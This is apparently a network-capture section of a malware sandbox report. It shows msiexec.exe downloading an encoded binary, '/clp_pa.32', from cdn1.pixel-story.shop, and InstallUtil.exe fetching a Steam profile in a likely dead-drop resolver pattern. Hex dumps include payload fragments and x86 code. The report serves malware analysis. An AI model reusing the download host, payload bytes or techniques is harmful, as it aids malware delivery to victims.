                                                                                                                                                                                                                              2024-11-17 23:15:39 UTC1369INData Raw: 74 08 ff 76 18 e8 e4 ff ff ff 83 7e 1c 00 75 4f 80 7e 10 00 75 18 8b 7e 14 85 ff 74 11 8b cf e8 89 16 00 00 6a 10 57 e8 0e e6 01 00 59 59 8b 46 0c ff 08 8b 46 0c 83 38 00 75 14 ff 36 e8 3f e6 01 00 6a 04 ff 76 0c e8 ee e5 01 00 83 c4 0c 6a 20 56 e8 e3 e5 01 00 59 59 5f 5e 5d c2 04 00 ff 76 1c 8b cf e8 85 ff ff ff eb a5 55 8b ec 51 53 56 8b 75 08 57 8b 7d 0c 89 4d fc 85 ff 0f 85 26 08 04 00 21 3e 5f 5e 5b 8b e5 5d c2 08 00 55 8b ec 83 7d 0c 00 74 44 56 57 8b 7d 08 8d 45 0c 50 57 e8 47 00 00 00 8b 75 0c 8b cf 56 e8 71 dc 00 00 85 c0 79 15 8b 4e 18 89 4f 18 89 77 1c 83 66 18 00 8b c7 5f 5e 5d c2 08 00 7e 1c 8b 46 1c 89 47 1c 89 77 18 83 66 1c 00 eb e7 8b 45 08 83 60 1c 00 83 60 18 00 eb de 8b c6 eb d8 cc 55 8b ec 83 ec 24 56 8b 75 0c 83 3e 00 0f 84 34 02 00
                                                                                                                                                                                                                              Data Ascii: tv~uO~u~tjWYYFF8u6?jvj VYY_^]vUQSVuW}M&!>_^[]U}tDVW}EPWGuVqyNOwf_^]~FGwfE``U$Vu>4
                                                                                                                                                                                                                              2024-11-17 23:15:39 UTC1369INData Raw: 22 40 00 f3 22 40 00 ef 22 40 00 ef 22 40 00 2d 27 44 00 69 27 44 00 b9 22 40 00 43 27 44 00 e6 27 44 00 ef 22 40 00 ab 28 44 00 ac 27 44 00 55 8b ec 51 51 53 8b d9 56 57 8b fa 8b 43 0c c1 e0 04 03 47 0c 8b 04 85 28 10 4b 00 83 e8 01 74 34 83 e8 01 0f 84 9f 05 04 00 83 e8 01 0f 85 2b 05 04 00 e8 0d 10 00 00 dd 5d f8 8b cf e8 03 10 00 00 dc 5d f8 df e0 f6 c4 41 74 1e 32 c0 5f 5e 5b 8b e5 5d c3 e8 87 0f 00 00 8b cf 8b f0 e8 7e 0f 00 00 3b f0 0f 9c c0 eb e4 b0 01 eb e0 55 8b ec 51 53 56 57 8b d9 68 14 02 00 00 89 5d fc e8 3c e0 01 00 8b 7d 08 8b f0 59 8b 17 8b 52 08 89 56 08 33 d2 8b 0f 8b 89 0c 01 00 00 89 8e 0c 01 00 00 85 c9 7e 1c 6a 0c 59 6a 04 5b 8b 07 42 8b 04 01 89 04 31 03 cb 3b 96 0c 01 00 00 7c ed 8b 5d fc 8b 07 33 d2 8b 80 10 02 00 00 89 86 10 02
                                                                                                                                                                                                                              Data Ascii: "@"@"@"@-'Di'D"@C'D'D"@(D'DUQQSVWCG(Kt4+]]At2_^[]~;UQSVWh]<}YRV3~jYj[B1;|]3
                                                                                                                                                                                                                              2024-11-17 23:15:39 UTC1369INData Raw: 04 01 00 00 89 04 17 8b 0e 8b 04 0f 0f af 41 08 89 41 08 8b 16 81 7a 08 00 00 00 01 7f 56 43 83 c7 04 3b 9a 0c 01 00 00 7c d3 8b 42 08 33 c9 ba 04 00 00 00 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 83 db 01 00 8b 0e 83 c4 04 89 41 04 33 c0 8b 0e 39 41 08 7e 19 8d a4 24 00 00 00 00 8b 49 04 c7 04 81 00 00 00 00 40 8b 0e 3b 41 08 7c ee b0 01 5f 5e 5b 5d c3 32 c0 eb f7 55 8b ec 8b 11 56 8b b2 10 02 00 00 83 fe 40 7d 19 8b 45 08 89 84 b2 10 01 00 00 8b 01 ff 80 10 02 00 00 b0 01 5e 5d c2 04 00 32 c0 eb f7 cc cc cc cc cc 53 8b d9 56 8b 13 8b 0a 83 f9 01 75 6f b0 01 84 c0 0f 84 90 00 04 00 33 f6 39 72 08 7f 34 ff 72 04 e8 fe da 01 00 8b 13 83 c4 04 c7 42 04 00 00 00 00 8b 03 5e c7 00 01 00 00 00 8b 03 c7 40 08 00 00 00 00 8b 03 5b c7 80 0c 01 00 00 00 00 00 00 c3 57 8b
                                                                                                                                                                                                                              Data Ascii: AAzVC;|B3QA39A~$I@;A|_^[]2UV@}E^]2SVuo39r4rB^@[W
                                                                                                                                                                                                                              2024-11-17 23:15:39 UTC1369INData Raw: cc cc 55 8b ec 83 ec 08 53 8b d9 56 57 8b 43 0c 83 f8 04 74 17 83 f8 03 0f 85 84 00 00 00 8b 4d 08 e8 9c 05 00 00 dc 03 dd 1b eb 60 83 f8 01 74 51 83 f8 02 74 4c 83 f8 03 74 47 83 f8 04 0f 85 c1 00 00 00 8b 43 08 68 40 d9 49 00 8b 30 56 e8 98 08 02 00 83 c4 08 85 c0 0f 84 90 00 00 00 83 7b 0c 03 74 1d 8b cb e8 56 05 00 00 8b cb dd 5d f8 e8 6c 02 00 00 dd 45 f8 dd 1b c7 43 0c 03 00 00 00 ff 75 08 8b cb e8 76 ff ff ff 8b 4b 08 85 c9 0f 85 dc fe 03 00 5f 5e 8b c3 5b 8b e5 5d c2 04 00 48 83 f8 0a 77 e4 0f b6 80 38 2f 40 00 ff 24 85 20 2f 40 00 8b 75 08 8b 46 0c 83 f8 01 75 50 8b 0e 8b 03 8d 34 08 99 89 45 08 8b fa 8b c1 8b 4d 08 99 03 c8 8b c6 13 fa 99 3b c1 0f 85 af fd 03 00 3b d7 0f 85 a7 fd 03 00 89 33 eb 9d 68 3c d9 49 00 56 e8 f2 07 02 00 83 c4 08 85 c0
                                                                                                                                                                                                                              Data Ascii: USVWCtM`tQtLtGCh@I0V{tV]lECuvK_^[]Hw8/@$ /@uFuP4EM;;3h<IV
                                                                                                                                                                                                                              2024-11-17 23:15:39 UTC1369INData Raw: e9 4c fd 03 00 55 8b ec 51 51 8b 41 0c 83 f8 07 0f 8f 40 fd 03 00 74 05 83 e8 01 75 06 8b 01 8b e5 5d c3 83 e8 01 74 f5 83 e8 01 75 09 dd 01 e8 f5 eb 03 00 eb e9 83 e8 01 75 2a 8b 41 08 8b 10 e8 11 f9 ff ff 84 c0 74 13 8d 4a 04 6a 10 8d 55 f8 e8 9f e6 ff ff 8b 45 f8 59 eb c3 52 e8 53 2e 02 00 59 eb ba 33 c0 eb b6 55 8b ec 8b 41 0c 83 ec 10 83 e8 01 74 12 83 e8 01 0f 84 79 fd 03 00 83 e8 01 75 10 dd 01 eb 08 db 01 dd 5d f8 dd 45 f8 8b e5 5d c3 83 e8 01 0f 85 ff fc 03 00 8b 41 08 8b 10 e8 ae f8 ff ff 84 c0 0f 85 2d fd 03 00 52 e8 88 9a 02 00 59 eb d8 55 8b ec 51 51 56 8b f1 8b 46 0c 83 e8 01 74 2a 83 e8 01 74 54 83 e8 01 74 25 83 e8 01 0f 85 2a fd 03 00 8b 56 08 8b 02 66 83 38 30 74 24 50 e8 f2 2d 02 00 59 5e 8b e5 5d c3 8b 06 99 eb f6 dd 06 83 ec 10 dd 5c
                                                                                                                                                                                                                              Data Ascii: LUQQA@tu]tuu*AtJjUEYRS.Y3UAtyu]E]A-RYUQQVFt*tTt%*Vf80t$P-Y^]\
                                                                                                                                                                                                                              2024-11-17 23:15:39 UTC1369INData Raw: 8c 24 98 00 00 00 a1 18 35 4d 00 c6 44 24 0f 00 3b 81 04 00 00 00 0f 8f 00 07 04 00 c7 05 38 35 4d 00 00 00 00 00 c7 05 34 35 4d 00 00 00 00 00 c7 44 24 5c 1c 35 4d 00 c7 84 24 84 00 00 00 1c 35 4d 00 8b 4c 24 44 8b 06 89 84 24 80 00 00 00 8b 49 04 8b 50 04 89 4c 24 24 85 c9 0f 84 fd 06 04 00 85 d2 0f 84 fd 06 04 00 8b 38 8b 44 24 44 8b 00 89 44 24 40 3b ca 0f 82 ac 02 00 00 8b d1 85 d2 74 33 0f b7 08 0f b7 c1 89 44 24 48 0f b7 07 89 4c 24 38 8b c8 89 4c 24 68 8b 4c 24 38 66 3b c8 75 17 8b 44 24 40 83 c7 02 83 c0 02 89 44 24 40 83 ea 01 75 cd 33 c0 eb 0f 8b 44 24 68 66 39 44 24 48 1b c0 83 e0 fe 40 85 c0 0f 88 a8 00 00 00 0f 8e 26 01 00 00 8b 4c 24 24 8b 84 24 80 00 00 00 8b 50 1c 85 d2 0f 84 15 01 00 00 8b 7a 04 3b f9 0f 87 31 07 00 00 8b 44 24 44 8b 0a
                                                                                                                                                                                                                              Data Ascii: $5MD$;85M45MD$\5M$5ML$D$IPL$$8D$DD$@;t3D$HL$8L$hL$8f;uD$@D$@u3D$hf9D$H@&L$$$Pz;1D$D


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              12192.168.2.1649717172.67.185.544437084C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-11-17 23:15:43 UTC174OUTGET /clp_pa.32 HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                                                                                                                              Host: cdn1.pixel-story.shop
                                                                                                                                                                                                                              2024-11-17 23:15:43 UTC868INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:43 GMT
                                                                                                                                                                                                                              Content-Length: 5998227
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              ETag: "7e51997869f0affe433246a2e5e05677"
                                                                                                                                                                                                                              Last-Modified: Sat, 16 Nov 2024 22:34:29 GMT
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yeuzohHllKg6xjrhZBOidzXZBZv1IAOBtooLYr5M%2BUOK7ftCCC%2FBViXTKbGw4KnFqwD79ouEsPKdTkc5ABmxDaPTub5KvmSPDXh1m%2FRU%2FFPz%2BdXw1gdJbu%2FD1Dx68BxKcHHu%2FD3wWM8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8e436ca54d95486e-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1192&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2871&recv_bytes=788&delivery_rate=2393388&cwnd=251&unsent_bytes=0&cid=379783f162ac64c3&ts=349&x=0"
                                                                                                                                                                                                                              2024-11-17 23:15:43 UTC1369INData Raw: 66 1f 4f f5 f6 f6 f6 91 b1 bf 87 80 af a0 9d 9d 84 91 98 b2 bb 9f b2 92 86 81 9a a1 af 85 92 b5 9d bd ac b1 8e bb 97 9f 91 95 80 94 85 90 a4 a7 98 8f ae 87 97 ae 9b be a0 97 af 95 b9 82 9b a4 a0 b0 a0 a2 99 86 a7 bc 87 b7 9d 9f 90 b7 be 80 85 9c af a3 b0 92 81 83 bd a4 bd 85 9e 83 9f 9d 9c b7 b3 9d b1 a2 9c b9 be bd bf 86 86 af a0 ba 9d b1 a1 a7 a1 94 bd b3 a6 a5 97 87 9b b4 91 9b 94 b9 ae a2 bd af 82 84 83 83 b2 85 b1 99 82 b8 b8 b9 bf b0 8c b9 b2 9a 91 9d 9b a2 b8 ba b9 a2 b9 b7 9a 9c a7 8f bd 94 bc 8f 99 a7 84 90 9c a6 99 86 9a a6 a0 b1 b4 93 8c 95 83 b4 94 a4 87 98 93 83 b9 8e 85 be 87 9a 80 ac ae bd 99 af 97 83 86 81 a7 af a7 86 97 ba 8e a7 9c 99 a3 b0 84 a6 af b9 9c ae bb 91 80 9e 82 9e 83 8c a4 85 a0 84 b9 93 a3 bc ac a3 80 80 8e ac 92 bf a7 bd a0
                                                                                                                                                                                                                              Data Ascii: fO
                                                                                                                                                                                                                              2024-11-17 23:15:43 UTC1369INData Raw: b5 85 97 ac a1 a2 be b4 8e 82 97 a6 83 b9 8c a0 b8 80 98 b3 b2 9a 82 b3 8c 80 97 a1 bc 8f b9 97 91 99 b0 ae b1 82 b1 9a b5 a7 a4 9a a3 9c b0 9d a2 be b4 90 ba 9f bc b8 ac 9c bc b9 bf 81 94 92 af ba b0 bc 87 b8 9b b1 85 b7 bd b0 b0 8c a4 ae 9c 97 9b 87 ae b7 93 bc bb 90 bd a7 80 99 9a 82 85 82 86 92 85 a1 a6 b8 a7 b4 a7 86 9f 83 b5 b2 b0 a5 a5 a0 bc be 81 94 91 b0 9d af 80 af 97 a6 8c bc a7 9e bd 86 9d b7 99 9a ba 84 8e be 98 a3 9e 9a be b9 ac b7 9f 81 92 83 b1 a7 81 8c 9d b0 b5 a2 93 92 93 a6 a1 bc be 9f 98 87 b5 ae b5 90 bf 97 b9 a2 bd b7 87 84 a7 8f ba b5 84 a7 b1 80 be a1 ae 9e a0 a4 92 af 9f 9a b0 b4 bb 93 97 a7 97 a6 9f 87 87 b0 8c 9f 9d 92 b0 94 87 af 9b 86 a5 b3 af a7 86 82 9a a1 b1 b7 99 a0 8f a7 81 97 97 ac b0 80 93 98 a5 9f 81 bd bc bb be ac 95
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              2024-11-17 23:15:43 UTC1369INData Raw: b2 9e a2 9f 83 bf b3 86 92 b8 90 9f b7 98 a0 b4 bd 94 a5 86 b3 ac 9f 99 b3 93 84 92 97 94 a3 af 8e 90 af 9c 98 95 9e ac b0 97 a3 86 b3 9f b5 bb bd 9a a3 b1 85 93 b4 94 84 b4 b1 a0 85 9d ae 9b 84 ae 92 9e bd bb 92 ae 95 a6 8e b5 a2 92 b8 90 87 b3 87 8c 9c a0 95 a6 99 9d 93 bd 82 a2 97 b1 97 94 bc 93 a2 ba a1 8c a1 9f bb 98 a0 97 b8 9c 9d ba ae 80 82 b7 ac 98 b2 9e b9 a1 b3 ae bb ba 8e be 8e 8f a7 bc 9e 90 8c b0 82 66 1f 4f f5 f6 f6 f6 b0 8e 84 bd be 84 bc b4 a5 a6 ac 80 9e a0 ac 87 91 9b ba ba a1 b5 9e 87 83 99 99 9f bd a4 b3 a7 90 b5 a1 9a 98 94 90 86 94 9e b4 81 9f bb 99 b7 ae 9e b8 af af bc 9b 9c 9b 90 a4 97 b4 8e bd 82 95 bc 8c 83 a5 80 85 9e b2 98 9f 93 a3 bd 8c 92 a3 bc bf 95 98 90 94 91 a4 94 94 bd 8f 9a a4 99 81 81 ba 97 84 b7 99 8e 84 95 9d 91 a5
                                                                                                                                                                                                                              Data Ascii: fO
                                                                                                                                                                                                                              2024-11-17 23:15:43 UTC1369INData Raw: 9b 91 84 9c a5 bf 95 80 97 a7 b5 91 b2 b7 a1 bf b8 be 90 b4 82 a4 a5 a2 95 9d 98 bb bf 99 a3 93 9c a4 a5 b3 8c a2 a7 8c 94 82 81 80 87 86 a2 b3 82 9b 99 95 9b 8c 8c b0 80 86 98 a1 80 94 b8 b9 b0 93 82 9b a7 af bc a7 a5 a7 84 9f 85 86 87 81 95 ba bf 90 9a a6 be a5 a7 91 a3 95 bf bb 87 8c bc 94 82 97 af a3 9a b3 83 9f af 81 b8 9a b9 ac a7 a7 b0 a6 bb 9f 90 a1 a4 94 b2 91 b5 87 92 ae a2 82 b2 ba 91 a1 ae a6 83 8c a7 b8 9d bd 9c 83 92 a4 bf 99 98 85 b1 af a3 82 98 b8 b8 b0 a0 9f 97 b3 a4 98 b2 a4 85 9f 8e 95 af 9b a2 9b ae 97 b7 b8 b3 be 85 b4 a0 a4 9a a6 bb 97 b4 99 9a 82 9d bf 99 b4 b1 ba a5 9a af 98 86 81 b0 9a a1 8e 9b 9a 87 93 be 98 b0 9c a2 af 8e 8e ba a0 a4 93 a1 84 9b 8e ba 92 a7 9d 9e be 84 8e b9 a1 80 be b3 8e 97 b8 a5 8f 84 82 b8 b8 b4 9a b8 94 94
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              2024-11-17 23:15:43 UTC1369INData Raw: 87 84 ba 9c ae 95 9b 97 a4 a3 a6 80 8e 83 83 9d b7 90 9e b7 80 a7 b2 9a b0 b2 b0 97 9a 85 ba b9 ac 92 81 9e 81 97 90 8c b9 a6 a0 bc 9d a5 87 82 93 bf 81 bf bb 98 94 99 be 92 9b a2 a5 b1 9f a3 bd 94 bd 9e b7 99 bd a0 a0 81 95 b2 b7 b8 93 bc 9a a6 a2 87 9d 81 92 a5 a5 9a 92 b4 98 83 98 b9 80 bc 98 b9 b2 b3 9f a6 94 bc a0 8c 94 81 bc 9e 8f 9c 95 9f b1 b1 8c a0 80 b9 85 87 83 9b b4 bd a6 87 ac 84 b7 98 8c 95 9c b8 a2 9f b7 86 b3 ba 91 99 be b0 8e bc ac a2 b8 a2 94 ba 9c a3 a6 a2 87 93 a1 a5 ba 9a b3 93 bd 9e a1 80 bf a4 b2 80 87 82 b7 b8 b3 92 9f b0 b1 ae bf b7 be 90 84 8e 9e ae 9b 97 9e a1 98 bb 9c bb ba 85 9d b0 a5 92 a4 b3 b1 81 81 a6 b4 80 ac bb 8e b2 b8 b8 b9 b5 87 bf 9b 9a 9a 8c 9c 86 b7 bc b4 9b a0 98 94 b5 85 a2 91 91 af 8f 8e 93 92 82 99 95 b4 b8 9d
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              2024-11-17 23:15:43 UTC1369INData Raw: f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 a6 b3 f6 f6 ba f7 fe f6 ef a8 b4 dc f6 f6 f6 f6 f6 f6 f6 f6 16 f6 78 77 fd f7 f4 ef f6 3c f7 f6 f6 a6 f6 f6 f6 f6 f6 f6 86 20 f7 f6 f6 e6 f6 f6 f6 16 f7 f6 f6 f6 b6 f6 f6 e6 f6 f6 f6 e6 f6 f6 f2 f6 f6 f6 f6 f6 f6 f6 f2 f6 f6 f6 f6 f6 f6 f6 f6 76 f4 f6 f6 f2 f6 f6 f6 f6 f6 f6 f4 f6 f6 f6 f6 f6 e6 f6 f6 b6 f6 f6 f6 f6 e6 f6 f6 e6 f6 f6 f6 f6 f6 f6 e6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f4
                                                                                                                                                                                                                              Data Ascii: xw< v
                                                                                                                                                                                                                              2024-11-17 23:15:43 UTC1369INData Raw: f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              2024-11-17 23:15:43 UTC1369INData Raw: f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              2024-11-17 23:15:43 UTC1369INData Raw: f6 62 e6 b6 f6 f9 fc bf bf 98 82 93 84 90 97 95 93 f6 f6 f6 f6 f7 f6 f6 f6 f6 f6 f6 f6 f6 36 f6 f6 f6 f6 f6 f6 b0 f0 a5 8f 85 82 93 9b f5 f6 09 09 3a 75 b2 d2 f2 0e 1f cb be f6 f6 75 b2 d2 f2 0e 1f ad be f6 f6 75 b2 d2 f2 0e 1f 93 be f6 f6 3a 3a 37 e6 b6 f6 3d e6 b6 f6 23 e6 b6 f6 f7 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 36 f6 f6 f6 f6 f6 f6 b0 17 e6 b6 f6 fe f6 f6 f6 f6 f6 f6 f6 7b b6 f6 aa e7 b6 f6 1b e6 b6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 f6 aa e7 b6 f6 fa f6 f6 f6 ea e6 b6 f6 a2 c0 b6 f6 2a ae b6 f6 1e ae b6 f6 9e c0 b6 f6 aa c0 b6 f6 0e ae b6 f6 06 c5 b6 f6 da c2 b6 f6 e7 a2 bf 98 82 93 84 90 97 95 93 92 b9 94 9c 93 95 82 7d 36 09 d3 32 f7 b4 f6 7d 36 09 d3 36 f7 b4 f6 7d 36 09 d3 4a f7 b4 f6 7d 36 09 d3 4e f7 b4 f6
                                                                                                                                                                                                                              Data Ascii: b6:uuu::7=#6{*}62}66}6J}6N
                                                                                                                                                                                                                              2024-11-17 23:15:43 UTC1369INData Raw: f6 77 10 f6 f6 09 09 7f 85 f2 9c f2 9e f6 d6 f6 f6 a0 a3 1e 4a 0a 09 09 7f f5 75 cd f6 82 d5 7d 25 4e 1a 03 b7 f6 1e 93 0b 09 09 72 36 83 e5 9e f6 76 f6 f6 9c f6 7d f5 a6 1e 68 0a 09 09 c5 36 7f f5 ab a9 a8 ad 35 66 a5 a0 a1 a3 75 32 1e 7d 0f 7d 02 31 b2 d2 fe 09 09 09 09 c5 3f 7f ba d2 fa 7f b2 d2 e6 f5 a2 d2 e6 7f a2 d2 e2 57 1a 03 b7 f6 7f f0 1d 9d 7d f0 7d f6 7f b2 d2 f2 7d f0 7d ae fe cd aa d2 e6 84 a4 7d 35 7d e0 f5 b4 fa cd b2 d2 e2 81 b3 cd aa d2 fe 85 f2 7f aa d2 fe 7d f0 7d 9e fe 7d f0 f5 9e fa cd 9a d2 fa 80 f2 7f 9a d2 fa 9e f6 76 f6 f6 9c f6 7d f0 7d b6 fe a6 1e e0 0a 09 09 73 36 83 fc 31 f3 3e 03 b7 f6 f7 f6 f6 f6 7d f0 1e e7 0b 09 09 7d b2 d2 f2 7f f0 4e 1a 03 b7 f6 cd f0 83 7a c5 36 7f f1 75 8a d2 fa f6 82 e7 7d b2 d2 fe 7f f1 7d b2 d2 fa
                                                                                                                                                                                                                              Data Ascii: wJu}%Nr6v}h65fu2}}1?W}}}}}5}}}}v}}s61>}}Nz6u}}


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              13192.168.2.1649718104.102.49.2544432852C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-11-17 23:15:56 UTC125OUTGET /profiles/76561198043764602 HTTP/1.1
                                                                                                                                                                                                                              Host: steamcommunity.com
                                                                                                                                                                                                                              User-Agent: Go-http-client/1.1
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              2024-11-17 23:15:57 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:57 GMT
                                                                                                                                                                                                                              Content-Length: 46684
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: sessionid=2abd46b956da7c4ac9a2903a; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                              Set-Cookie: steamCountry=US%7Ca05a64099ae5bec168e9113a8529411f; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                              2024-11-17 23:15:57 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
